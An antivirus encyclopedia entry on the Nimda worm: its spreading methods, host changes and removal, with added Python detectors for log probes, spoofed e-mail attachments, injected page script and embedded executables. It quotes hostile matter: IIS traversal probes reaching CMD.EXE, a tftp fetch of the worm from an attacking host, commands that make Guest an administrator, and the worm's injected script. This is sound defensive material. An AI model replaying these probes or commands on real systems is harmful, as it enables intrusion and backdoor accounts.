Virus Encyclopedia

I-Worm/Nimda

This extremely troublesome worm combines a whole range of spreading methods. It sends itself by e-mail, installs itself on unpatched IIS web servers, spreads to neighbouring computers over open network shares, and a client can pick it up simply by viewing pages on an infected server.

It arrives in an e-mail as an attached file README.EXE. The attachment is declared with a harmless MIME type (audio/x-wav), so in Outlook or Outlook Express the worm can run as soon as the message is displayed, without the attachment ever being opened by the user.

A description of this security hole can be found at this URL:
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

The latest IE security bulletin at the time of writing, with a link to its patch:
http://www.microsoft.com/technet/security/bulletin/MS01-027.asp

It harvests e-mail addresses to send itself to from web pages saved in the browser cache (as I-Worm/Sircam did). Once it has infected a computer, it starts a thread that generates random IP addresses and tries to connect to them, probing each web server it finds for known IIS security holes it can use: the directory-traversal bugs that let a URL reach CMD.EXE, and the ROOT.EXE backdoor left behind by CodeRed II.

Descriptions of the individual holes, with links to the patches for them, can be found here:
http://www.microsoft.com/technet/security/topics/Nimda.asp

The worm also reuses the copies of the system file CMD.EXE that CodeRed II (aka CodeRed.c) left as ROOT.EXE in the web-accessible script directories of servers it had compromised, so such a server can be taken over without any further exploit.
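The scanning thread leaves a very recognisable trail in the logs of every web server it touches, whether or not the probe succeeded. The following is an added example (written for this page, not AVG's or Microsoft's code) of how an administrator can pick those probes out of an IIS W3C log. The log excerpt is constructed for the example: the request paths are the forms Nimda used (the ROOT.EXE backdoor, the Unicode and double-decode traversals to CMD.EXE, and the TFTP fetch of ADMIN.DLL), while the IP addresses, timestamps and field layout are made up. The decoder deliberately reproduces the two IIS decoding bugs (overlong UTF-8, MS00-078, and double decoding, MS01-026) so that every encoding variant collapses to the same canonical path.

```python
import re
from typing import Dict, List

# Constructed IIS 5 W3C-style log excerpt (not a real capture). The probe paths are the
# request forms Nimda's scanner thread sent; the IPs, times and field order are made up.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 14:02:11 10.0.0.77 GET /scripts/root.exe /c+dir 404
2001-09-18 14:02:11 10.0.0.77 GET /MSADC/root.exe /c+dir 404
2001-09-18 14:02:12 10.0.0.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:12 10.0.0.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:12 10.0.0.77 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:12 10.0.0.77 GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:13 10.0.0.77 GET /scripts/root.exe /c+tftp%20-i%2010.0.0.77%20GET%20Admin.dll%20c:\Admin.dll 200
2001-09-18 14:05:40 10.0.0.9 GET /default.htm - 200
2001-09-18 14:05:41 10.0.0.9 GET /images/logo.gif - 200
"""

HEXDIGITS = b"0123456789abcdefABCDEF"


def percent_decode_once(data: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes are copied through untouched."""
    out = bytearray()
    i = 0
    while i < len(data):
        if (data[i] == 0x25 and i + 2 < len(data)
                and data[i + 1] in HEXDIGITS and data[i + 2] in HEXDIGITS):
            out.append(int(data[i + 1:i + 3].decode("ascii"), 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def fold_overlong_utf8(data: bytes) -> str:
    """Mimic the lenient decoder of unpatched IIS (the MS00-078 bug): a 0xC0/0xC1 lead
    byte plus whatever byte follows is folded into one ASCII character, so
    %c0%af becomes '/' and %c1%1c becomes '\\'."""
    out = []
    i = 0
    while i < len(data):
        c = data[i]
        if c in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((c & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c))
            i += 1
    return "".join(out)


def canonicalize(uri: str) -> str:
    """Decode a URI the way the vulnerable server effectively did: repeated
    percent-decoding (the MS01-026 double-decode bug) followed by overlong UTF-8
    folding, then backslashes mapped to '/' and the result lower-cased."""
    raw = uri.encode("latin-1", "replace")
    for _ in range(3):  # two passes cover the known probes; the third is a safety margin
        decoded = percent_decode_once(raw)
        if decoded == raw:
            break
        raw = decoded
    return fold_overlong_utf8(raw).replace("\\", "/").lower()


PROBE_RE = re.compile(r"/(cmd|root)\.exe$")


def classify_request(stem: str, query: str) -> str:
    """Label one request: benign, a probe for CodeRed II's ROOT.EXE backdoor, a probe
    for the traversal holes that reach CMD.EXE, or the TFTP fetch of the worm body."""
    path = canonicalize(stem)
    m = PROBE_RE.search(path)
    if not m:
        return "benign"
    if "tftp" in canonicalize(query):
        return "payload-fetch"  # shell reached; pulling Admin.dll from the attacking host
    return "rootexe-backdoor-probe" if m.group(1) == "root" else "cmd-traversal-probe"


def scan_iis_log(text: str) -> List[Dict[str, str]]:
    """Return one record per request that looks like a Nimda probe, using the
    #Fields: header to locate the columns."""
    fields: List[str] = []
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-method") != "GET":
            continue
        verdict = classify_request(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-"))
        if verdict != "benign":
            hits.append({"ip": rec["c-ip"], "verdict": verdict,
                         "path": canonicalize(rec["cs-uri-stem"])})
    return hits


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["ip"], hit["verdict"], hit["path"])
```

A 404 on one of these requests does not mean the source is harmless: the client sending them is itself infected and should be reported or isolated. A 200 on a CMD.EXE or ROOT.EXE request, followed by a query containing tftp, means the server answered and the worm body was very likely fetched.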

It then scans the local hard disks for files whose names contain one of the following strings:
default, index, main, readme
and carry one of the extensions .htm, .html or .asp.
To each such file it appends a small piece of JavaScript that opens the file readme.eml in a browser window placed off-screen. That file is a copy of the e-mail message the worm sends out, dropped into the same folder, so a vulnerable browser runs the attachment exactly as the mail clients above do. Copies of this message with the extensions .eml (and .nws) are strewn across folders on the disks.
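Both the mail attachment and the readme.eml dropped next to web pages rely on the same trick: a part that is really an executable but is declared with an inline-rendered MIME type and pulled in through a hidden iframe. The following is an added example (not code from this page or from AVG) that checks a message for that label/content mismatch and checks a web page for the appended script. Both inputs are constructed for the example: the message mirrors the layout of a Nimda-style readme.eml with a 48-byte stand-in for the executable, and the page is a made-up index.htm with the worm's script appended.

```python
import email
import re
from email import policy
from typing import Dict, List

# Constructed sample with the layout of a Nimda-style readme.eml: a multipart message
# whose HTML part embeds an invisible iframe pointing (by Content-ID) at a part that is
# really an executable but is labelled audio/x-wav. The "executable" is a stand-in:
# 48 bytes starting with an MZ signature, not real code.
SAMPLE_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="outer"
X-Unsent: 1

--outer
Content-Type: multipart/alternative; boundary="inner"

--inner
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EXAMPLEID height=0 width=0></iframe></BODY></HTML>
--inner--

--outer
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EXAMPLEID>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--outer--
"""

# Constructed web page as the worm leaves it: the site's own index.htm followed by the
# appended script, which opens readme.eml in a window pushed off-screen.
SAMPLE_HTML = """\
<html><head><title>Welcome</title></head>
<body><h1>Example Corp intranet</h1></body></html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
"""

EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".dll")


def find_mime_spoofed_attachments(raw: str) -> List[Dict[str, str]]:
    """Parts whose declared type is something the mail client renders inline
    (anything not application/*) while the name or the payload says executable.
    This label/content mismatch is what the MS01-020 hole turned into code execution."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings: List[Dict[str, str]] = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        looks_executable = name.endswith(EXECUTABLE_EXT) or payload[:2] == b"MZ"
        if looks_executable and not ctype.startswith("application/"):
            findings.append({
                "content_type": ctype,
                "name": name,
                "content_id": (part.get("Content-ID") or "").strip("<>"),
            })
    return findings


IFRAME_CID_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)


def find_hidden_iframe_refs(raw: str) -> List[str]:
    """Content-IDs referenced from <iframe src=cid:...> in the message's HTML parts."""
    msg = email.message_from_string(raw, policy=policy.default)
    refs: List[str] = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            html = (part.get_payload(decode=True) or b"").decode("latin-1", "replace")
            refs.extend(IFRAME_CID_RE.findall(html))
    return refs


def is_nimda_style_message(raw: str) -> bool:
    """True when an HTML part's iframe points at a mislabelled executable part."""
    spoofed_ids = {f["content_id"] for f in find_mime_spoofed_attachments(raw)}
    return any(ref in spoofed_ids for ref in find_hidden_iframe_refs(raw))


INJECT_RE = re.compile(r"window\.open\(\s*[\"']([^\"']*\.eml)[\"']", re.I)


def find_eml_injection(html: str) -> List[str]:
    """Names of .eml files a page's script opens; a non-empty result on a
    default/index/main/readme .htm/.html/.asp file is the infection marker."""
    return INJECT_RE.findall(html)


if __name__ == "__main__":
    print(find_mime_spoofed_attachments(SAMPLE_EML))
    print(find_hidden_iframe_refs(SAMPLE_EML))
    print(is_nimda_style_message(SAMPLE_EML))
    print(find_eml_injection(SAMPLE_HTML))
```

The check deliberately keys on the mismatch rather than on the name readme.exe, so renamed variants are caught too. On a cleaned web server the injection check should return nothing for every page; any page where it still fires has to be edited to cut the appended script (the worm adds it after the closing tag, so the site's own content is intact).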

It also places copies of itself on the disk under the names MMC.EXE, LOAD.EXE, RICHED20.DLL and ADMIN.DLL. RICHED20.DLL replaces the legitimate rich-text editing library, so any program that loads it (WordPad, for instance) starts the worm. LOAD.EXE is started with every Windows boot through the [boot] section of SYSTEM.INI, whose shell line is changed to:
shell=explorer.exe load -dontrunold

I-Worm/Nimda also lowers the security of the infected computer one step further. It creates (or enables) the Guest account, gives it an empty password and adds it to the Administrators group:
net user guest /add
net user guest /active
net localgroup Guests guest /add
net localgroup Administrators guest /add
net user guest ""

It shares all local drives over the network and switches off the display of extensions for known file types in Explorer, so that README.EXE shows simply as README.
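The SYSTEM.INI shell line, the Guest account's group membership and the Explorer extension setting are quick things to check on any machine suspected of infection. The following is an added example (not from this page or from AVG) that evaluates those three indicators from data an administrator would collect by hand. All inputs are constructed: a made-up SYSTEM.INI, the output of "net localgroup Administrators" as it appears on Windows 2000, and the HideFileExt value as read from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.

```python
import re
from typing import Dict, List

# Constructed artefacts from a hypothetical infected Windows 2000 host (not real captures).
SYSTEM_INI = """\
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv

[boot]
shell=explorer.exe load -dontrunold
drivers=mmsystem.dll

[386Enh]
woafont=dosapp.fon
"""

NET_LOCALGROUP_ADMINISTRATORS = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Guest
The command completed successfully.
"""

HIDE_FILE_EXT = 1  # Explorer\Advanced\HideFileExt: 1 = extensions hidden (what the worm sets)


def boot_shell(ini_text: str) -> str:
    """Value of shell= in the [boot] section of an INI file; '' if absent."""
    section = None
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "boot" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "shell":
                return value.strip()
    return ""


def localgroup_members(net_output: str) -> List[str]:
    """Member names from 'net localgroup <group>' output: the lines between the
    dashed rule and the trailing status line."""
    members: List[str] = []
    in_list = False
    for line in net_output.splitlines():
        if line.startswith("----"):
            in_list = True
            continue
        if in_list:
            if not line.strip() or line.startswith("The command completed"):
                break
            members.append(line.strip())
    return members


NIMDA_SHELL_RE = re.compile(r"^explorer\.exe\s+load(\s|$)", re.I)


def nimda_host_indicators(ini_text: str, admins_output: str, hide_file_ext: int) -> Dict[str, bool]:
    """Evaluate the host-side changes described above. 'shell_hijacked' fires for any
    shell other than plain explorer.exe, not only Nimda's, so on its own it is a cue to
    look closer rather than proof."""
    shell = boot_shell(ini_text)
    admins = [m.lower() for m in localgroup_members(admins_output)]
    return {
        "shell_hijacked": shell.lower() != "explorer.exe",
        "shell_is_nimda_load": bool(NIMDA_SHELL_RE.match(shell)),
        "guest_is_admin": "guest" in admins,
        "extensions_hidden": hide_file_ext == 1,
    }


if __name__ == "__main__":
    result = nimda_host_indicators(SYSTEM_INI, NET_LOCALGROUP_ADMINISTRATORS, HIDE_FILE_EXT)
    for name, hit in result.items():
        print(f"{name:22s} {'YES' if hit else 'no'}")
```

The shell check matters most: as long as that line stands, LOAD.EXE is relaunched at every boot, so cleaning the dropped files without restoring the line only works until the next restart.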
Last but not least, the worm infects .EXE and .DLL files by a rather unusual technique: it creates a copy of itself, gives it the icon of the attacked file and stores the original file in the resource section of the new copy, then replaces the original file with that copy. When the infected program is started, the worm runs first, extracts the original from its resources and launches it, so the program appears to work normally.
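Because the original program is carried whole inside the infected file, an infected file contains two complete executable headers. The following is an added example (not from this page or from AVG) of a heuristic that finds a second MZ/PE header pair inside a file, modelled on constructed stand-in images rather than real executables. The model appends the original to the worm body instead of placing it in a resource entry, which does not change the detection; carving the original back out, however, is only exact for the appended model, as the note in the code says.

```python
import struct
from typing import List

PE_SIG = b"PE\0\0"


def pe_header_offset(data: bytes, base: int) -> int:
    """Offset of the PE signature for an MZ header starting at `base`, or -1 if the
    bytes at `base` are not a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if data[base:base + 2] != b"MZ" or len(data) < base + 0x40:
        return -1
    e_lfanew = struct.unpack_from("<I", data, base + 0x3C)[0]
    pe = base + e_lfanew
    return pe if data[pe:pe + 4] == PE_SIG else -1


def embedded_pe_offsets(data: bytes) -> List[int]:
    """Every offset after 0 at which a complete MZ/PE header pair begins. The outer
    file is a PE and so is the program it carries, so an infected file yields one hit.
    Self-extracting archives and installers carry PEs too, so treat a hit as a lead."""
    found: List[int] = []
    pos = data.find(b"MZ", 1)
    while pos != -1:
        if pe_header_offset(data, pos) != -1:
            found.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return found


def carve_carried_program(data: bytes) -> bytes:
    """Bytes from the first embedded header to the end of the file. Exact for the
    appended model used here; in a real Nimda victim the original sits in a resource
    entry and the resource size, not end-of-file, bounds it."""
    offsets = embedded_pe_offsets(data)
    return data[offsets[0]:] if offsets else b""


def make_stub_image(tag: bytes) -> bytes:
    """Constructed, non-runnable stand-in for a PE: a 0x40-byte DOS header whose
    e_lfanew points at a PE signature, then a tag and some padding."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + PE_SIG + tag + b"\0" * 64


def model_infection(worm: bytes, host: bytes) -> bytes:
    """The worm body first, the untouched original after it (appended here in place of
    Nimda's resource section; the detection above does not depend on where it sits)."""
    return worm + host


if __name__ == "__main__":
    worm, host = make_stub_image(b"WORM"), make_stub_image(b"HOST")
    infected = model_infection(worm, host)
    print("clean    :", embedded_pe_offsets(host))
    print("infected :", embedded_pe_offsets(infected))
    print("carved == original:", carve_carried_program(infected) == host)
```

Checking that e_lfanew really lands on a PE signature is what keeps the heuristic from firing on every stray "MZ" byte pair in a data section.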

Removal:
If the infected computer is connected to a LAN, unplug it from the LAN and reconnect it only once all the computers on the LAN are clean, otherwise it will be reinfected over the shares. In any case, install all available security patches.

1. Download the removal utility rmnimda.exe
2. Run the utility
3. Restart the computer
4. Scan the computer with the AVG complete test
5. Delete all infected files
6. Repeat until computer is clean

Finally undo the worm's changes: remove the sharing of the disks, take the Guest account out of the Administrators group and disable it, restore the shell line in SYSTEM.INI to shell=explorer.exe, replace RICHED20.DLL with the original copy, delete the stray .eml and .nws files and the script appended to web pages, and switch the display of file extensions back on.